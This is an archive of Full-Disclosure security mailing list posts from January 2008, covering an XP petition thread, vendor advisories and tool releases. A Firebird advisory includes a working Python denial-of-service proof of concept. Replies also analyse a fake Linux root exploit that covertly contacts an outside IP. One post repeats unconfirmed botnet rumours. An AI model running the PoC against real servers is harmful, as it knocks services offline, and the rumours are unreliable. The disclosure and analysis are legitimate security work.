Re: [Full-disclosure] Save XP
Valdis, This was the joke. :.) it's cool however! On Jan 28, 2008 7:00 PM, <[EMAIL PROTECTED]> wrote: > On Mon, 28 Jan 2008 18:52:37 EST, T Biehn said: > > Do you guys really think that any of those options are viable > > alternatives to windows? > > Actually, they *are* viable alternatives to Windows for a very large > percentage > of things that need doing... > > > No wonder you don't score management jobs! > > Actually, a large part of the industry-wide security problem is that the > people who *did* score management jobs are people who say "Do you guys really > think any of those options are viable alternatives to windows?". > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
If you have any concrete arguments in defense of Windows based operating systems as opposed to available alternatives please state them and it will make a worthwhile discussion. On Mon, 2008-01-28 at 18:52 -0500, T Biehn wrote: > Do you guys really think that any of those options are viable > alternatives to windows? > No wonder you don't score management jobs! > > On Jan 28, 2008 5:45 PM, Paul Schmehl <[EMAIL PROTECTED]> wrote: > > --On Monday, January 28, 2008 15:43:51 -0500 scott <[EMAIL PROTECTED]> > > wrote: > > > > > > > For all those who believe Vista is still not up to par,you can help stop > > > MS > > > from forcing us to go to Vista. > > > > > > For those who don't know,MS is planning on stopping XP sales after June > > > 30,2008.There are a few options for enterprise users,but Joe XP user will > > > not > > > be able to go to any store and buy a copy of XP after that date.Or at > > > least > > > after the stores sell out of what they have on hand. > > > > > > You can sign a petition at InfoWorld that may delay or stop MS from > > > forcing > > > us to use Vista. > > > > > > Sign the petition here: > > > http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRY&Source=savexpblog0801 > > > 14&Source_BC=13&Script=/LP/80276783/reg& > > > Maybe we can stop this. > > > > > > > Or, rather than trying to swim upstream, you could buy a Mac. Or install > > *nix* > > on your Winblows computer.. > > > > -- > > Paul Schmehl ([EMAIL PROTECTED]) > > Senior Information Security Analyst > > The University of Texas at Dallas > > http://www.utdallas.edu/ir/security/ > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- -=[ dxp ]=- 0xA3F3C6E3 signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
One more thing. Nobody is forcing you go buy Vista. Believe it or not, you have alternatives in the market. If Vista sucks so badly in your mind, go buy something else. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
On Mon, 28 Jan 2008 18:52:37 EST, T Biehn said: > Do you guys really think that any of those options are viable > alternatives to windows? Actually, they *are* viable alternatives to Windows for a very large percentage of things that need doing... > No wonder you don't score management jobs! Actually, a large part of the industry-wide security problem is that the people who *did* score management jobs are people who say "Do you guys really think any of those options are viable alternatives to windows?". pgpa8wRXpcwZN.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
Do you guys really think that any of those options are viable alternatives to windows? No wonder you don't score management jobs! On Jan 28, 2008 5:45 PM, Paul Schmehl <[EMAIL PROTECTED]> wrote: > --On Monday, January 28, 2008 15:43:51 -0500 scott <[EMAIL PROTECTED]> > wrote: > > > > For all those who believe Vista is still not up to par,you can help stop MS > > from forcing us to go to Vista. > > > > For those who don't know,MS is planning on stopping XP sales after June > > 30,2008.There are a few options for enterprise users,but Joe XP user will > > not > > be able to go to any store and buy a copy of XP after that date.Or at least > > after the stores sell out of what they have on hand. > > > > You can sign a petition at InfoWorld that may delay or stop MS from forcing > > us to use Vista. > > > > Sign the petition here: > > http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRY&Source=savexpblog0801 > > 14&Source_BC=13&Script=/LP/80276783/reg& > > Maybe we can stop this. > > > > Or, rather than trying to swim upstream, you could buy a Mac. Or install > *nix* > on your Winblows computer.. > > -- > Paul Schmehl ([EMAIL PROTECTED]) > Senior Information Security Analyst > The University of Texas at Dallas > http://www.utdallas.edu/ir/security/ > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
--On Monday, January 28, 2008 15:43:51 -0500 scott <[EMAIL PROTECTED]> wrote: > For all those who believe Vista is still not up to par,you can help stop MS > from forcing us to go to Vista. > > For those who don't know,MS is planning on stopping XP sales after June > 30,2008.There are a few options for enterprise users,but Joe XP user will not > be able to go to any store and buy a copy of XP after that date.Or at least > after the stores sell out of what they have on hand. > > You can sign a petition at InfoWorld that may delay or stop MS from forcing > us to use Vista. > > Sign the petition here: > http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRY&Source=savexpblog0801 > 14&Source_BC=13&Script=/LP/80276783/reg& > Maybe we can stop this. > Or, rather than trying to swim upstream, you could buy a Mac. Or install *nix* on your Winblows computer.. -- Paul Schmehl ([EMAIL PROTECTED]) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
On Jan 28, 2008 2:43 PM, scott <[EMAIL PROTECTED]> wrote: > For those who don't know,MS is planning on stopping XP sales after June > 30,2008.There are a few options for enterprise users,but Joe XP user > will not be able to go to any store and buy a copy of XP after that > date.Or at least after the stores sell out of what they have on hand. Or you can move to either Linux or one of the other free operating systems, or you can go buy a Mac. Plenty of options out there. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
On Jan 28, 2008 3:43 PM, scott <[EMAIL PROTECTED]> wrote: > For all those who believe Vista is still not up to par,you can help stop > MS from forcing us to go to Vista. > > buy a copy of XP after that date. who cares really ?? the user will just go to some joker who will install a version for $25/- /pd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
>>MS is planning on stopping XP sales after June 30,2008. Why don't you start hoarding copies now? Come July you'll run the market! Ha ha ha! Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Save XP
For all those who believe Vista is still not up to par,you can help stop MS from forcing us to go to Vista. For those who don't know,MS is planning on stopping XP sales after June 30,2008.There are a few options for enterprise users,but Joe XP user will not be able to go to any store and buy a copy of XP after that date.Or at least after the stores sell out of what they have on hand. You can sign a petition at InfoWorld that may delay or stop MS from forcing us to use Vista. Sign the petition here: http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRY&Source=savexpblog080114&Source_BC=13&Script=/LP/80276783/reg&; Maybe we can stop this. Regards, Scott signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day LINUX 0day LATEST
On Mon, 28 Jan 2008 10:13:38 GMT, wejwklekl246 said: > /* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE > * > * afunixroot.c Linux kernel 2.6.x i386 local root exploit > * > * Tested under: > * > * Redhat 7.0 The hint du jour: Getting a RH7.0 system to boot a 2.6 kernel is nontrivial (among other things, you have to get udev working first). The fact that various RedHat systems are listed, but no Fedora releases are listed, should be a clue that all is not what it seems. So you might want to decode those hex strings before running it.. ;) pgpqTJdpuyC7o.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1478-1] New mysql-dfsg-5.0 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1478-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff January 28, 2008 http://www.debian.org/security/faq - Package: mysql-dfsg-5.0 Vulnerability : buffer overflows Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-0226 CVE-2008-0227 Luigi Auriemma discovered two buffer overflows in YaSSL, an SSL implementation included in the MySQL database package, which could lead to denial of service and possibly the execution of arbitrary code. For the unstable distribution (sid), these problems have been fixed in version 5.0.51-3. For the stable distribution (etch), these problems have been fixed in version 5.0.32-7etch5. The old stable distribution (sarge) doesn't contain mysql-dfsg-5.0. We recommend that you upgrade your mysql-dfsg-5.0 package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch5.diff.gz Size/MD5 checksum: 165895 05351b7ac0547d3666828c7eba89ee18 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch5.dsc Size/MD5 checksum: 1117 7d6a184cf5bda53d18be88728a0635c4 Architecture independent packages: http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch5_all.deb Size/MD5 checksum:45636 c2d87b9755088b3a67851dc4867a67f8 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch5_all.deb Size/MD5 checksum:47716 5c9311fc2072be8336424c648497303e http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch5_all.deb Size/MD5 checksum:53944 3a16dd0a2c795cf7e906c648844a9779 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_alpha.deb Size/MD5 checksum: 8912752 826f18c201582262ee622ed9e470a915 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_alpha.deb Size/MD5 checksum: 1950712 47215338ef678adf7ca6f80d9d60613e http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_alpha.deb Size/MD5 checksum: 8407802 e6e87a2edaf5f0405473fb3f5c859b3f http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_alpha.deb Size/MD5 checksum: 27365718 f83e12f0f36c31b4dbd64ab7b1b6f01d http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_alpha.deb Size/MD5 checksum:47748 91489bb86084a9f6026c6156a4a5faa0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_amd64.deb Size/MD5 checksum: 7376450 ba1c75fa6963352a0af68c4db08d0c12 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_amd64.deb Size/MD5 checksum:47708 4a3047795b3030063a47c969cfe4c324 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_amd64.deb Size/MD5 checksum: 1830910 c24fc179d4fb37994b5af2cb8c405ff1 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_amd64.deb Size/MD5 checksum: 25939846 8b0e047de274ed90f69a76f22866561a http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_amd64.deb Size/MD5 checksum: 7547346 003c7231b81203a50ec563ff5142a010 arm architecture (ARM) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_arm.deb Size/MD5 checksum:47756 0145e1aa5ec02b5c60c2d78bbcd334a0 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_arm.deb Size/MD5 checksum: 25345622 2de813c86f1d10fb2df34d8b9de2336e http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.3
[Full-disclosure] Uninformed Journal Release Announcement: Volume 9
Uninformed is pleased to announce the release of its 9th volume. This volume includes 4 articles focusing on reverse engineering and exploitation technology. Engineering in Reverse: - An Objective Analysis of the Lockdown Protection System for Battle.net Author: Skywing Exploitation Technology: - ActiveX - Active Exploitation Author: warlord - Context-keyed Payload Encoding Author: I)ruid - Improving Software Security Analysis using Exploitation Properties Author: skape This volume of the journal can be found at: http://www.uninformed.org/?v=9 About Uninformed: Uninformed is a non-commercial technical outlet for research in areas pertaining to security technologies, reverse engineering, and lowlevel programming. The goal, as the name implies, is to act as a medium for providing informative information to the uninformed. The research presented in each edition is simply an example of the evolutionary thought that affects all academic and professional disciplines. - The Uninformed Staff staff [at] uninformed.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A friendly request on behalf of Bart Cilfone
lol best troll ever On 1/28/08, Donald Republic <[EMAIL PROTECTED]> wrote: > > Dear Full Disclosure, > > We are writing to you in behalf of Bart Cilfone. He has asked us to > contact you and see if you will consider removing the content about him at: > > http://seclists.org/fulldisclosure/2008/Jan/0497.html > > Please allow us to introduce ourselves. We are ReputationDefender, Inc., a > company dedicated to helping our clients preserve their good name on the > Internet. Our founders and employees are all regular Internet users. Like > our clients, and perhaps like you, we think the Internet is sometimes > unnecessarily hurtful to the privacy and reputations of everyday people. > Even content that is meant to be informative can sometimes have a > significant and negative impact on someone's job prospects, student > applications, and personal life. We invite you to learn more about who we > are, at www.reputationdefender.com. > > When our clients sign up with our service, we undertake deep research > about them on the Internet to see what the Web is saying about them. We find > sites where they are discussed, and we ask our clients how they feel about > those sites. Sometimes our clients express strong reservations about the > content on particular websites. They may feel hurt, ashamed, or "invaded" by > the content about them on those sites. > > As you may know, more and more prospective employers, universities, and > newfound friends and romantic interests undertake Internet research, and the > material they find can strongly impact their impressions of the people they > are getting to know. When people apply for jobs, apply for college or > graduate school, apply for loans, begin dating, or seek to do any number of > other things with their lives, hurtful content about them on the Internet > can have a negative impact on their opportunities. At some point or another, > most of us say things about ourselves or our friends and acquaintances we > later regret. We're all human, and we all do it! > > We are writing to you today because our client, Bart Cilfone, has told us > that he would like the content about him on your website to be removed as it > is outdated and disturbing to him. Would you be willing to remove or alter > the content? It would mean so much to Mr. Cilfone, and to us. Considerate > actions such as these will go a long way to help make the Internet a more > civil place. > > Thank you very much for your consideration. We are mindful that matters > like these can be sensitive. We appreciate your time. > > Please let us know if you have removed or changed the content on this site > by sending an e-mail to: [EMAIL PROTECTED] > > > Yours sincerely, > > Donald Republic > Reputation Defender Service Team > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Nipper update released
Nipper is a network infrastructure parser. It processes configuration files from network devices and produces a report including a security audit of the device, configuration settings and other relevant information. Nipper currently supports the following device types: * Cisco IOS-based routers * Cisco IOS-based catalysts * Cisco NMP-based catalysts * Cisco CatOS-based catalysts * Cisco PIX-based Firewalls * Cisco ASA-based Firewalls * Cisco FWSM-based Firewalls * Cisco Content Service Switches * Juniper ScreenOS-based Firewalls (NetScreen) * Nortel Passport devices * CheckPoint Firewall-1 Firewalls * Sonicwall SonicOS-based Firewalls The security audit includes details of the findings, together with detailed recommendations. The security audit can be modified using command line parameters or an external configuration file. This update (0.11.3) includes improvements to support for Cisco PIX / ASA / FWSM firewalls, SonicWALL SonicOS firewalls, CheckPoint Firewall-1 and Nokia IP firewalls. It also includes a host of other updates. Nipper is available for Linux, Windows and other platforms. It can be downloaded from the Source Forge project page (http://sourceforge.net/projects/nipper). If you have access to device configuration files for network devices, please consider sending them to me. I will be discrete, but you are welcome to sanitise them first. However, if you do sanitise them, please ensure that the structure of the config file is not modified. Ian Ventura-Whiting ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A friendly request on behalf of Bart Cilfone
RW50ZXJ0YWluaW5nIHRobyBpdCBpcyB0byByZWFkIFN0YWNrIFNtYXNoZXIncyAiZGFtbiB0aGUg dG9ycGVkb3MiIGNvbW1lbnQsIGl0IGlzIG5ldmVydGhlbGVzcyB0cnVlIHRvIHNheSB0aGF0IGxh d3MgRE8gbWVhbiBzb21ldGhpbmcgb24gdGhlIGludGVybmV0LiBUaGUgbmV3cyBzaXRlcyBhcmUg cmVwbGV0ZSB3aXRoIHN1Y2Nlc3NmdWwgc3VlaW5ncyBhbmQgY2Vhc2UgYW5kIGRlc2lzdCB2aWN0 b3JpZXMsIGFuZCB5b3UgY2FuIGJlIHN1cmUgdGhhdCBhY2N1c2luZyBzb21lb25lIG9mIGJlaW5n IGEgcGFlZG9waGlsZSBpbiBwcmludCwgd2l0aG91dCBwcm9vZiAoYW5kIGluIHNvbWUgY2FzZXMg cmVnYXJkbGVzcyBvZiBwcm9vZikgaXMgaWxsZWdhbCB1bmRlciB0aGUgc2xhbmRlciwgbGliZWwg YW5kIGRlZmFtYXRpb24gbGF3cyBwcmVzZW50IGluIG1vc3QgY2l2aWxpc2VkIGNvdW50cmllcy4N Cg0KUmVnYXJkbGVzcywgRkQgaXMgbWlycm9yZWQgYW5kIGFyY2hpdmVkIGJ5IGNvbW1lcmNpYWwg b3IgcGVyc29uYWxseSBuYW1lZCBlbnRpdGllcyBhbmQgaXQgbWF0dGVycyBub3Qgd2hhdCB5b3Ug dGhpbmssIHRoZSBvZmZlbmRpbmcgY29udGVudCB3aWxsIGJlIHJlbW92ZWQuIFdlJ3ZlIGJlZW4g YXNrZWQgbmljZWx5IGFuZCBhbHRob3VnaCB3ZSBhcmUgdGhlIHdyb25nIG9uZXMgdG8gYXNrIChh bmQgSSdtIHByZXR0eSBzdXJlIFJlcHV0YXRpb25EZWZlbmRlcnMgd29udCByZWFkIHRoaXMpIHRo ZXkgd2lsbCBzb29uIGZpZ3VyZSBvdXQgd2hvICdvd25zJyBGRCBhbmQgdGhlIGNvbnRlbnQgd2ls bCBiZSB0YWtlbiBkb3duLg0KDQpDaGVlcnMNCg0KSmFtZXNEUw== From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Stack Smasher Sent: 28 January 2008 13:55 To: Donald Republic Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] A friendly request on behalf of Bart Cilfone Sorry Mr.Cilfone, This is the interweb and your laws mean nothing here. Go try to spook someone else. On Jan 28, 2008 8:23 AM, Donald Republic <[EMAIL PROTECTED]> wrote: Dear Full Disclosure, We are writing to you in behalf of Bart Cilfone. He has asked us to contact you and see if you will consider removing the content about him at: http://seclists.org/fulldisclosure/2008/Jan/0497.html Please allow us to introduce ourselves. We are ReputationDefender, Inc., a company dedicated to helping our clients preserve their good name on the Internet. Our founders and employees are all regular Internet users. Like our clients, and perhaps like you, we think the Internet is sometimes unnecessarily hurtful to the privacy and reputations of everyday people. Even content that is meant to be informative can sometimes have a significant and negative impact on someone's job prospects, student applications, and personal life. We invite you to learn more about who we are, at www.reputationdefender.com. When our clients sign up with our service, we undertake deep research about them on the Internet to see what the Web is saying about them. We find sites where they are discussed, and we ask our clients how they feel about those sites. Sometimes our clients express strong reservations about the content on particular websites. They may feel hurt, ashamed, or "invaded" by the content about them on those sites. As you may know, more and more prospective employers, universities, and newfound friends and romantic interests undertake Internet research, and the material they find can strongly impact their impressions of the people they are getting to know. When people apply for jobs, apply for college or graduate school, apply for loans, begin dating, or seek to do any number of other things with their lives, hurtful content about them on the Internet can have a negative impact on their opportunities. At some point or another, most of us say things about ourselves or our friends and acquaintances we later regret. We're all human, and we all do it! We are writing to you today because our client, Bart Cilfone, has told us that he would like the content about him on your website to be removed as it is outdated and disturbing to him. Would you be willing to remove or alter the content? It would mean so much to Mr. Cilfone, and to us. Considerate actions such as these will go a long way to help make the Internet a more civil place. Thank you very much for your consideration. We are mindful that matters like these can be sensitive. We appreciate your time. Please let us know if you have removed or changed the content on this site by sending an e-mail to: [EMAIL PROTECTED] Yours sincerely, Donald Republic Reputation Defender Service Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- "If you see me laughing, you better have backups" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Metasploit Framework v3.1 Released
On Jan 28, 2008 11:50 AM, worried security <[EMAIL PROTECTED]> wrote: > On Jan 28, 2008 5:32 AM, H D Moore <[EMAIL PROTECTED]> wrote: > > The latest version of the Metasploit Framework, as well as screen > > shots, video demonstrations, documentation and installation > > instructions for many platforms, can be found online at > > > > http://metasploit3.com/ > > The site is down, maybe those chanology guys changed targets. No its not. Maybe you can't click on a link properly -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Metasploit Framework v3.1 Released
On Jan 28, 2008 5:50 PM, worried security <[EMAIL PROTECTED]> wrote: [...] > > http://metasploit3.com/ > > The site is down, maybe those chanology guys changed targets. [...] >From here, it's up... -- Marco Ermini [EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research https://www.linkedin.com/in/marcoermini "Jesus saves... but Buddha makes incremental back-ups!" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2007-1219: Firebird Remote Memory Corruption
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs Firebird Remote Memory Corruption *Advisory Information* Title: Firebird Remote Memory Corruption Advisory ID: CORE-2007-1219 Advisory URL: http://www.coresecurity.com/?action=item&id=2095 Date published: 2008-01-28 Date of last update: 2008-01-24 Vendors contacted: Firebird SQL Release mode: Coordinated Release *Vulnerability Information* Class: Memory corruption Remotely Exploitable: Yes Locally Exploitable: Yes Bugtraq ID: 27403 CVE Name: CVE-2008-0387 *Vulnerability Description* Firebird [1][2] is a relational database that runs on Linux, Windows, and a variety of Unix platforms. The Firebird Project is a commercially independent project of C and C++ programmers, technical advisors and supporters developing and enhancing a multi-platform relational database management system based on the source code released by Inprise Corp (now known as Borland Software Corp) on 25 July, 2000. The Firebird database manager contains an Integer Overflow in the processing of certain tags on the XDR protocol used for communication with the server. This led the server to corrupt the process memory and crash. Repeated attempts are followed by a crash of the process in charge of restarting the database server. This may also grant attackers remote execution of arbitrary code on servers running Firebird. *Vulnerable packages* . Firebird SQL 1.0.3 and before. . Firebird SQL 1.5.5 and before. . Firebird SQL 2.0.3 and before. . Firebird SQL 2.1.0 Beta 2 and before. *Non-vulnerable packages* . Firebird SQL 1.5.6 (to be released) . Firebird SQL 2.0.4 (to be released) . Firebird SQL 2.1.0 RC1 *Vendor Information, Solutions and Workarounds* Firebird v2.1.0 RC1 fixes this vulnerability and is available for download at http://firebirdsql.org/index.php?op=files&id=fb210_RC1 The fix will also be included in versions v1.5.6 and v2.0.4. Version 2.0.4 will be released in February. The version 1.5.6 release is expected later this year. The issue is registered [3] in Firebird Tracker as CORE-1681. *Credits* This vulnerability was discovered and researched by Damian Frizza with assistance of Alfredo Ortega from Core Security Technologies. *Technical Description / Proof of Concept Code* The memory corruption happens when the parser (src/remote/protocol.cpp) receives any of the following operations with invalid data: op_receive op_start op_start_and_receive op_send op_start_and_send op_start_send_and_receive The parser fails to properly sanitize certain variables before use. We can see that in the file src/remote/protocol.cpp there are the following assignments directly from the packet buffer to the data structure, without any validation (The MAP macro doesn't have any range checking): src/remote/protocol.cpp:417 MAP(xdr_short, reinterpret_cast(data->p_data_request)); MAP(xdr_short, reinterpret_cast(data->p_data_incarnation)); MAP(xdr_short, reinterpret_cast(data->p_data_transaction)); MAP(xdr_short, reinterpret_cast(data->p_data_message_number)); /* Changes to this op's protocol must mirror in xdr_protocol_overhead */ return xdr_request(xdrs, data->p_data_request, data->p_data_message_number, data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p); And in the function xdr_request(), the variable data->p_data_request (as request_id) is used to index an array: ... rrq* request = (rrq*) port->port_objects[request_id]; ... Corrupting memory structures and causing a DoS of the server, with possible execution of code. The same happens with the variable data->p_data_message_number. The following python PoC causes a remote Denial of service and demonstrates the bug: ##Firebird DoS ##Damian Frizza - Core Security Exploit Writers Team ##tested against Firebird-2.0.3.12981-1-Win32.exe and ##Firebird-2.1.0.16780_0_Win32.exe ##fbserver.exe 2.0.3 ##005637D0 8B4424 08MOV EAX,DWORD PTR SS:[ESP+8] ##005637D4 0FB700 MOVZX EAX,WORD PTR DS:[EAX] ##005637D7 83EC 50 SUB ESP,50 ##005637DA 56 PUSH ESI ##005637DB 8BF1 MOV ESI,ECX ##005637DD 8B8E AC00MOV ECX,DWORD PTR DS:[ESI+AC] ##005637E3 3B41 08 CMP EAX,DWORD PTR DS:[ECX+8] < ##CRASH HERE import socket import time def getTargetIP(): return '192.168.xxx.xxx' port= 3050 op = '\x4a' packet = '\x00\x00\x00' + op + 'A' * 2000 ##Making the connection and sending the data 5 times, fbguard.exe fails ##to restart the service. for i in range(0, 5): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((getTargetIP(), port)) s.send(str(packet)) s.close() time.sleep(1) *Report Timeline* 2008-01-04: Initial notification sent by C
Re: [Full-disclosure] Project Chanology
On Jan 26, 2008 10:18 PM, Dude VanWinkle <[EMAIL PROTECTED]> wrote: > Don't fuck with n3td3v man Dude Van Wanker knows the pecking order around here... In other news, Chanology Crew are running scared... the FBI a knocking a soon. As for the "Anonymous" who jumped on the Chanology bandwagon, they are as good as dead. The Digg/Reddit propaganda won't hold up for much longer now that the bot net is out of action. "Anonymous" who are seperate from Chanology called for world wide protests outside Centre of Scientology's around the world on February 10th, but that will flop as a none starter I think. "Anonymous" are just the propaganda arm of Chanology, which are random members of the public for the most part. Also rumor has it Chanology is Bantown, but this is not confirmed as yet, but my informants are working overtime to find out more. Chanology are no longer a threat to any other website because they don't have a bot net now. My main concern was the same people were going to use the bot net for other things, but its in the industry's interest to track the bot net so it can't be used for any other purposes/political agenda/or other exploitation. Regards, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Metasploit Framework v3.1 Released
On Jan 28, 2008 5:32 AM, H D Moore <[EMAIL PROTECTED]> wrote: > The latest version of the Metasploit Framework, as well as screen > shots, video demonstrations, documentation and installation > instructions for many platforms, can be found online at > > http://metasploit3.com/ The site is down, maybe those chanology guys changed targets. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day LINUX 0day LATEST
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On 28 Jan 2008, at 10:55, Andrew Farmer wrote:
> On 28 Jan 08, at 02:13, wejwklekl246 wrote:
>> /* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
>> *
>> * afunixroot.c Linux kernel 2.6.x i386 local root exploit
>
>
>
> Compiles a shared library in /tmp/own.so containing the functions
>
> int getuid() { return 0; }
> int geteuid() { return 0; }
> int getgid() { return 0; }
> int getegid() { return 0; }
>
> and executes /bin/sh with LD_PRELOAD=/tmp/own.so
>
> Pretty lame. Protip: "hellc0de" containing lots of \x61-\x7f looks
> fake.
This whole exploit program is seemingly a massive obsfucation exercise.
Apart from the above, the prepare() function has "hidden" socket()
and sendto() calls to send a 64 byte parameter block to 213.73.91.29
port 864 (repeated 9 times).
The rest is repeated fork/wait/nice stuff that will probably have a
DoS effect on the system it's run on, but no privilege elevation...
Regards,
Andrew.
- --
Andrew Dawson
Operating Systems Group Manager
Information Systems
Education & Information Support Division
University College London
Gower Street
London WC1E 6BT
-BEGIN PGP SIGNATURE-
